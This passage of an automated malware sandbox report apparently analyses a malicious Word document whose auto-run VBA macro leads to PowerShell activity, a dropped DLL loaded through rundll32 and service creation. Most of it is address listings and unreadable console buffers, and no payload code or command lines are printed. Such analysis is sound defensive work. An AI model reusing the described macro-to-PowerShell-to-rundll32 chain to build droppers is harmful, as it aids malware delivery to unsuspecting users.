Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002512B6 11_2_002512B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00256ABA 11_2_00256ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026D08F 11_2_0026D08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026A094 11_2_0026A094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025F099 11_2_0025F099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00257AE4 11_2_00257AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00269AE2 11_2_00269AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B0E1 11_2_0025B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026A2EA 11_2_0026A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025D2CE 11_2_0025D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025DEC9 11_2_0025DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002668CB 11_2_002668CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002676D5 11_2_002676D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002612D1 11_2_002612D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025E924 11_2_0025E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025792C 11_2_0025792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025BB28 11_2_0025BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00265D36 11_2_00265D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00260705 11_2_00260705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00255D0E 11_2_00255D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00268313 11_2_00268313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00262513 11_2_00262513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00265B60 11_2_00265B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00268978 11_2_00268978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00252746 11_2_00252746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00263745 11_2_00263745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00256342 11_2_00256342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00258F55 11_2_00258F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026C95E 11_2_0026C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025DB5B 11_2_0025DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002581A0 11_2_002581A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B3A2 11_2_0025B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002567AC 11_2_002567AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253FAB 11_2_00253FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025FFB5 11_2_0025FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026CBB0 11_2_0026CBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002559B8 11_2_002559B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025EF80 11_2_0025EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00258994 11_2_00258994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253B97 11_2_00253B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026B19F 11_2_0026B19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002639E1 11_2_002639E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002533F4 11_2_002533F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B7F8 11_2_0025B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025C3C2 11_2_0025C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216C05 13_2_00216C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216E8A 13_2_00216E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214121 13_2_00214121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022533C 13_2_0022533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021FB04 13_2_0021FB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00219716 13_2_00219716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021E360 13_2_0021E360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225748 13_2_00225748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00224DAD 13_2_00224DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022C19B 13_2_0022C19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A7E4 13_2_0022A7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002183F0 13_2_002183F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214828 13_2_00214828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00211600 13_2_00211600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00223600 13_2_00223600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213618 13_2_00213618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225060 13_2_00225060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220C65 13_2_00220C65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D668 13_2_0021D668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021766F 13_2_0021766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021F471 13_2_0021F471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00221C79 13_2_00221C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021427A 13_2_0021427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228E79 13_2_00228E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00222A7D 13_2_00222A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D04B 13_2_0021D04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021884A 13_2_0021884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00227A50 13_2_00227A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220EA0 13_2_00220EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021C8A5 13_2_0021C8A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002272AE 13_2_002272AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002112B6 13_2_002112B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216ABA 13_2_00216ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022D08F 13_2_0022D08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A094 13_2_0022A094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021F099 13_2_0021F099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00229AE2 13_2_00229AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B0E1 13_2_0021B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00217AE4 13_2_00217AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A2EA 13_2_0022A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021DEC9 13_2_0021DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002268CB 13_2_002268CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D2CE 13_2_0021D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002212D1 13_2_002212D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002276D5 13_2_002276D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021E924 13_2_0021E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021BB28 13_2_0021BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021792C 13_2_0021792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225D36 13_2_00225D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220705 13_2_00220705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00215D0E 13_2_00215D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228313 13_2_00228313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00222513 13_2_00222513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225B60 13_2_00225B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228978 13_2_00228978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216342 13_2_00216342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00212746 13_2_00212746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00223745 13_2_00223745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00218F55 13_2_00218F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021DB5B 13_2_0021DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022C95E 13_2_0022C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214D5F 13_2_00214D5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002181A0 13_2_002181A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B3A2 13_2_0021B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213FAB 13_2_00213FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002167AC 13_2_002167AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022CBB0 13_2_0022CBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021FFB5 13_2_0021FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002159B8 13_2_002159B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021EF80 13_2_0021EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00218994 13_2_00218994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213B97 13_2_00213B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022B19F 13_2_0022B19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002239E1 13_2_002239E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002133F4 13_2_002133F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B7F8 13_2_0021B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021C3C2 13_2_0021C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E6C05 14_2_001E6C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E6E8A 14_2_001E6E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E9716 14_2_001E9716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EFB04 14_2_001EFB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F533C 14_2_001F533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E4121 14_2_001E4121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F5748 14_2_001F5748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EE360 14_2_001EE360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FC19B 14_2_001FC19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4DAD 14_2_001F4DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E83F0 14_2_001E83F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FA7E4 14_2_001FA7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E3618 14_2_001E3618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E1600 14_2_001E1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F3600 14_2_001F3600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E4828 14_2_001E4828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F7A50 14_2_001F7A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E884A 14_2_001E884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001ED04B 14_2_001ED04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F2A7D 14_2_001F2A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E427A 14_2_001E427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F1C79 14_2_001F1C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F8E79 14_2_001F8E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EF471 14_2_001EF471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E766F 14_2_001E766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001ED668 14_2_001ED668
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Informacion_4-09757.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Informacion_4-09757.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1000B078 appears 46 times
Yara signature match
Source: 00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2095324924.00000000001E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Yvtlx6p4.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.999343417553
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/9@1/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: CreateServiceW, 11_2_002545C3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$formacion_4-09757.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC706.tmp Jump to behavior
Source: Informacion_4-09757.doc OLE indicator, Word Document stream: true
Source: Informacion_4-09757.doc OLE document summary: title field not present or empty
Source: Informacion_4-09757.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............?........................... .].......].....................................#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............?...H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........c............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................!..j......................A.............}..v......y.....0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................!..j..... A...............A.............}..v....P.y.....0.l...............c.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v......y.....0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......c...............A.............}..v......y.....0.l...............c.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Q..j......................A.............}..v....P.{.....0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Q..j..... A...............A.............}..v......{.....0.l.............h.c.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....Hc...............A.............}..v....P.......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j......................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....Hc...............A.............}..v....P.......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j......................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....Hc...............A.............}..v....P.......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j......................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.l.............8Ec.....(.......H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j....X.................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.l.............8Ec.....$.......H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E./........................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ................A.............}..v.... !......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....Hc...............A.............}..v.....'......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....(................A.............}..v.... )......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....Hc...............A.............}..v...../......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....0................A.............}..v.... 1......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....Hc...............A.............}..v.....7......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....8................A.............}..v.... 9......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j......................A.............}..v.....?......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....@................A.............}..v.... A......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....Hc...............A.............}..v.....G......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....H................A.............}..v.... I......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....Hc...............A.............}..v.....O......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....P................A.............}..v.... Q......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....Hc...............A.............}..v.....W......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....X................A.............}..v.... Y......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................A.............}..v....._......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....`................A.............}..v.... a......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....g......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....h................A.............}..v.... i......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....o......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....p................A.............}..v.... q......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....w......0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....x................A.............}..v.... y......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
